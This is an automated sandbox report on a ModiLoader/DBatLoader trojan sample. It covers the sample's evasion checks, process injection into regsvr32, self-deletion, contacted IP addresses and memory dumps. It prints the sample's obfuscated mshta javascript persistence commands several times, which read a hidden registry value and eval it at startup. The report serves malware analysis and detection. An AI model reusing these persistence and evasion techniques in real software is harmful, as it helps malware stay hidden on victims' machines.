Malware Analysis Report

2024-10-23 19:35

Sample ID: 240505-tfgfbshe49
Target: 1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118
SHA256: f12851c350ac9d71760465bfe01bc7e17f3dd2575412d99865cde1bbdf16d353
Tags: modiloader evasion persistence trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: f12851c350ac9d71760465bfe01bc7e17f3dd2575412d99865cde1bbdf16d353

Threat Level: Known bad

The file 1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Checks for common network interception software

Looks for VMWare Tools registry key

Adds policy Run key to start application

Checks BIOS information in registry

Deletes itself

Adds Run key to start application

Maps connected drives based on registry

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-05 15:59

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-05 15:59
Reported: 2024-05-05 16:02
Platform: win7-20240221-en
Max time kernel: 150s
Max time network: 153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader
Tags: trojan modiloader

Checks for common network interception software
Tags: evasion

Looks for VirtualBox Guest Additions in registry
Tags: evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | C:\Windows\SysWOW64\regsvr32.exe | N/A

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (41 identical rows)

Adds policy Run key to start application

Tags: persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:PsA8xjRa=\"cck5GvZ\";G03U=new%20ActiveXObject(\"WScript.Shell\");sYyg8JvGW=\"EtR0apx6to\";e3Q8vT=G03U.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\9e4ab122db\\\\a90a5c2c\");p1VOGEMz=\"0TKUsc6\";eval(e3Q8vT);Ol21kIDT=\"6AdNYwT2\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\regsvr32.exe | N/A

Looks for VMWare Tools registry key

Tags: evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | C:\Windows\SysWOW64\regsvr32.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A

Adds Run key to start application

Tags: persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:xzNVCR5=\"04vllgF19c\";wa08=new%20ActiveXObject(\"WScript.Shell\");rH0i2VfpNH=\"YajvegY\";nmU3R3=wa08.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\9e4ab122db\\\\a90a5c2c\");Dg0QPofg=\"YvGkS\";eval(nmU3R3);k3TtIGC=\"rH\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:p8sENf3O=\"vTTzJsID9\";K05g=new%20ActiveXObject(\"WScript.Shell\");krl8KES=\"wrnL3VDldN\";wF8nt=K05g.RegRead(\"HKCU\\\\software\\\\9e4ab122db\\\\a90a5c2c\");QOVKp3pE=\"fP7at634MA\";eval(wF8nt);guU7kjI=\"z5sDzbp\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A

Maps connected drives based on registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A

Modifies Internet Explorer settings

Tags: adware spyware
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\International | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Windows\SysWOW64\regsvr32.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A (64 identical rows)

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1084 wrote to memory of 2436 | N/A | C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe | C:\Windows\SysWOW64\regsvr32.exe (7 identical rows)
PID 2436 wrote to memory of 2700 | N/A | C:\Windows\SysWOW64\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe (7 identical rows)
PID 2700 wrote to memory of 2360 | N/A | C:\Windows\SysWOW64\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe (7 identical rows)
PID 2700 wrote to memory of 552 | N/A | C:\Windows\SysWOW64\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe (7 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe
  Command line: regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe
  Command line: regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe
  Command line: "C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe
  Command line: "C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
AU 16.50.180.48:80 tcp
FR 89.234.158.153:80 tcp
US 117.51.92.22:80 tcp
US 24.248.152.96:80 tcp
KE 197.182.9.131:80 tcp
JP 133.156.68.93:80 tcp
BR 179.218.219.214:80 tcp
MA 160.168.129.9:80 tcp
TW 111.240.154.58:80 tcp
PL 89.73.180.35:80 tcp
US 11.52.35.65:80 tcp
CN 121.35.86.200:80 tcp
CN 49.234.140.54:80 tcp
CN 183.70.179.118:80 tcp
SE 93.182.142.185:80 tcp
MU 165.55.90.111:80 tcp
TR 83.66.19.60:8080 tcp
SG 8.174.253.40:80 tcp
US 173.117.42.23:80 tcp
AR 181.91.131.210:80 tcp
KR 39.121.130.196:80 tcp
ZA 197.84.49.155:80 tcp
US 6.218.141.68:80 tcp
US 214.29.217.165:80 tcp
CN 111.121.244.65:80 tcp
CN 36.219.205.40:80 tcp
US 52.252.160.75:443 tcp
US 154.17.109.222:80 tcp
US 173.69.99.90:443 tcp
BR 187.40.100.182:80 tcp
US 216.79.33.214:443 tcp
JP 121.93.30.187:80 tcp
SE 159.107.50.58:80 tcp
CN 113.222.148.120:80 tcp
DZ 154.246.233.43:80 tcp
US 204.165.16.131:443 tcp
US 104.212.254.6:80 tcp
KR 223.165.159.20:443 tcp
EG 197.124.29.213:80 tcp
US 140.175.94.19:80 tcp
US 174.138.66.253:80 tcp
US 163.205.135.168:80 tcp
US 174.138.66.253:80 174.138.66.253 tcp
KR 203.247.201.90:80 tcp
CN 117.42.22.75:80 tcp
US 30.23.74.192:80 tcp
US 33.42.180.149:80 tcp
CA 184.107.39.173:80 tcp
ZA 102.255.235.145:8080 tcp
GB 86.53.248.96:80 tcp
CN 119.139.185.174:80 tcp
BR 189.99.61.73:80 tcp
US 48.60.159.175:80 tcp
FR 130.84.53.39:80 tcp
PL 46.113.64.222:80 tcp
US 199.18.193.199:80 tcp
DE 62.8.129.151:80 tcp
IN 59.93.207.58:80 tcp
TR 31.206.141.74:80 tcp
US 38.234.69.201:80 tcp
GB 163.1.215.129:80 tcp
CN 112.113.51.162:80 tcp
DE 141.69.158.76:443 tcp
SA 144.86.88.119:80 tcp
US 21.22.233.19:80 tcp
US 30.153.95.222:80 tcp
US 129.170.227.158:80 tcp
CN 171.219.179.231:80 tcp
US 156.152.190.110:80 tcp
FR 4.176.13.65:8080 tcp
US 134.129.131.46:80 tcp
DE 87.149.7.227:80 tcp
AR 186.100.60.196:443 tcp
CN 171.208.52.210:80 tcp
NO 62.16.202.225:80 tcp
US 73.189.92.165:80 tcp
CA 184.163.91.212:80 tcp
JP 150.42.89.232:80 tcp
US 69.78.33.138:80 tcp
US 44.95.192.61:80 tcp
IE 87.46.207.111:80 tcp
US 66.221.191.197:80 tcp
US 21.139.230.90:8080 tcp
CZ 104.64.120.251:80 tcp
CN 218.94.160.116:80 tcp
US 151.113.81.13:80 tcp
CI 41.206.236.181:80 tcp
MA 196.78.185.35:443 tcp
US 66.252.221.233:80 tcp
US 129.52.232.255:80 tcp
US 63.233.183.228:80 tcp
BR 45.181.119.123:80 tcp
US 38.115.131.82:80 tcp
N/A 10.24.100.193:80 tcp
FR 212.208.85.29:80 tcp
CN 47.116.29.110:80 tcp
ZA 41.4.109.83:80 tcp
US 33.82.181.191:80 tcp
SG 43.34.51.199:80 tcp
US 173.68.181.240:80 tcp
SA 100.227.128.223:80 tcp
IT 130.136.219.225:8080 tcp
US 98.29.182.174:80 tcp
DE 134.130.12.247:8080 tcp
US 7.95.127.203:80 tcp
AU 1.144.36.101:443 tcp
CA 132.215.171.53:80 tcp
US 128.181.152.99:80 tcp
JP 61.204.74.184:80 tcp
US 52.249.149.239:80 tcp
US 44.170.203.167:80 tcp
US 26.27.140.57:443 tcp
JP 203.165.248.247:443 tcp
KE 102.7.190.153:443 tcp
CA 131.140.25.5:80 tcp
CM 102.244.81.127:80 tcp
AR 186.127.115.102:80 tcp
US 9.253.169.40:80 tcp
MX 201.113.79.228:8080 tcp
US 199.188.28.158:80 tcp
PT 94.133.231.139:80 tcp
CN 61.190.172.167:80 tcp
GB 51.246.221.57:80 tcp
US 136.112.82.86:80 tcp
PL 213.25.250.11:80 tcp
CN 202.5.212.10:80 tcp
N/A 127.215.237.6:80 tcp
US 108.4.214.37:80 tcp
US 99.75.56.202:80 tcp
TW 140.117.239.3:80 tcp
AU 58.169.153.163:80 tcp
US 56.60.35.232:80 tcp
US 66.224.119.141:80 tcp
N/A 10.40.172.123:80 tcp
US 50.46.234.222:80 tcp
KR 115.14.35.213:80 tcp
BY 178.123.10.3:80 tcp
US 158.61.1.138:80 tcp
GB 47.67.37.136:80 tcp
CN 123.149.156.121:80 tcp
US 48.101.109.2:80 tcp
US 16.117.92.127:80 tcp
US 148.78.239.167:80 tcp
BR 187.87.94.181:80 tcp
CN 180.178.200.60:80 tcp
US 56.236.212.29:80 tcp
GB 18.168.206.39:80 tcp
BR 201.41.221.235:80 tcp
TW 34.80.210.46:80 tcp
US 166.228.100.107:443 tcp
US 21.182.178.252:443 tcp
GB 137.105.213.146:80 tcp
FR 92.165.228.157:443 tcp
US 63.100.153.103:80 tcp
CN 117.146.112.10:80 tcp
US 99.30.22.63:80 tcp
US 214.253.46.50:80 tcp
CN 116.63.254.48:80 tcp
US 149.42.87.9:80 tcp
JP 116.223.179.240:443 tcp
RU 2.92.249.218:80 tcp
BR 206.43.53.167:80 tcp
ES 212.145.148.107:80 tcp
US 68.14.131.44:8080 tcp
US 184.53.162.181:80 tcp
KZ 5.34.24.157:80 tcp
GB 95.131.81.218:80 tcp
N/A 8.232.47.86:80 tcp

Files

memory/1084-0-0x0000000002590000-0x0000000002690000-memory.dmp
memory/1084-1-0x0000000000280000-0x0000000000281000-memory.dmp
memory/1084-2-0x0000000000280000-0x0000000000281000-memory.dmp
memory/1084-3-0x0000000002590000-0x0000000002690000-memory.dmp
memory/1084-4-0x0000000000400000-0x0000000000484000-memory.dmp
memory/1084-8-0x0000000000050000-0x000000000011C000-memory.dmp
memory/1084-10-0x0000000000050000-0x000000000011C000-memory.dmp
memory/1084-7-0x0000000000050000-0x000000000011C000-memory.dmp
memory/1084-9-0x0000000000050000-0x000000000011C000-memory.dmp
memory/1084-6-0x0000000000050000-0x000000000011C000-memory.dmp
memory/2436-16-0x00000000007B0000-0x00000000007B7000-memory.dmp
memory/1084-11-0x0000000000050000-0x000000000011C000-memory.dmp
memory/1084-18-0x0000000000400000-0x0000000000484000-memory.dmp
memory/2436-20-0x00000000007B0000-0x00000000007B7000-memory.dmp
memory/2436-21-0x00000000000D0000-0x000000000019C000-memory.dmp
memory/2436-23-0x00000000000D0000-0x000000000019C000-memory.dmp
memory/2436-25-0x00000000000D0000-0x000000000019C000-memory.dmp
memory/2436-22-0x00000000000D0000-0x000000000019C000-memory.dmp
memory/2436-24-0x00000000000D0000-0x000000000019C000-memory.dmp
memory/2436-26-0x00000000000D0000-0x000000000019C000-memory.dmp
memory/2700-33-0x00000000007B0000-0x00000000007B7000-memory.dmp
memory/2700-31-0x00000000007B0000-0x00000000007B7000-memory.dmp
memory/2700-36-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-37-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-41-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-40-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-39-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-38-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-42-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-43-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-48-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-47-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-46-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-45-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-44-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-49-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-50-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2360-51-0x00000000007B0000-0x00000000007B7000-memory.dmp
memory/2360-53-0x00000000007B0000-0x00000000007B7000-memory.dmp
memory/2360-54-0x00000000001E0000-0x00000000002AC000-memory.dmp
memory/2360-55-0x00000000001E0000-0x00000000002AC000-memory.dmp
memory/2360-59-0x00000000001E0000-0x00000000002AC000-memory.dmp
memory/2360-58-0x00000000001E0000-0x00000000002AC000-memory.dmp
memory/2360-56-0x00000000001E0000-0x00000000002AC000-memory.dmp
memory/2700-60-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/2700-61-0x0000000000110000-0x00000000001DC000-memory.dmp
memory/552-65-0x0000000000270000-0x000000000033C000-memory.dmp
memory/552-68-0x0000000000270000-0x000000000033C000-memory.dmp
memory/552-67-0x0000000000270000-0x000000000033C000-memory.dmp
memory/552-66-0x0000000000270000-0x000000000033C000-memory.dmp
memory/552-69-0x0000000000270000-0x000000000033C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-05-05 15:59
Reported: 2024-05-05 16:02
Platform: win10v2004-20240419-en
Max time kernel: 149s
Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader
Tags: trojan modiloader

Checks for common network interception software
Tags: evasion

Looks for VirtualBox Guest Additions in registry
Tags: evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Windows\SysWOW64\regsvr32.exe | N/A

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (37 identical rows)

Adds policy Run key to start application

Tags: persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:nyARd0KG=\"CAHi53qt\";KT3=new%20ActiveXObject(\"WScript.Shell\");GqX4iq9zCb=\"CIri6UXbqC\";GJu5j=KT3.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ae1eb04480\\\\cc0542a5\");Rt9QmSux=\"MQkq\";eval(GJu5j);M77HvldS=\"FWO\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A

Looks for VMWare Tools registry key

Tags: evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Windows\SysWOW64\regsvr32.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A

Adds Run key to start application

Tags: persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:OA6nrMby=\"uoj\";c0Q2=new%20ActiveXObject(\"WScript.Shell\");u4mzMsS8=\"fADfGyl\";hR97UD=c0Q2.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ae1eb04480\\\\cc0542a5\");bP0JSC1kK=\"lyUZ\";eval(hR97UD);wWZ3YAS=\"iBLeq\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:LewS8J2Lwj=\"lAE7IR\";dH8=new%20ActiveXObject(\"WScript.Shell\");OiFa7Sl=\"q4KVbB\";vDN1e=dH8.RegRead(\"HKCU\\\\software\\\\ae1eb04480\\\\cc0542a5\");CKcoG8hGW=\"x\";eval(vDN1e);btt7OVV1C=\"c\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A

Maps connected drives based on registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A

Modifies Internet Explorer settings

Tags: adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\International | C:\Windows\SysWOW64\regsvr32.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A (64 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe
  Command line: regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe
  Command line: regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe
  Command line: "C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe
  Command line: "C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp

Files
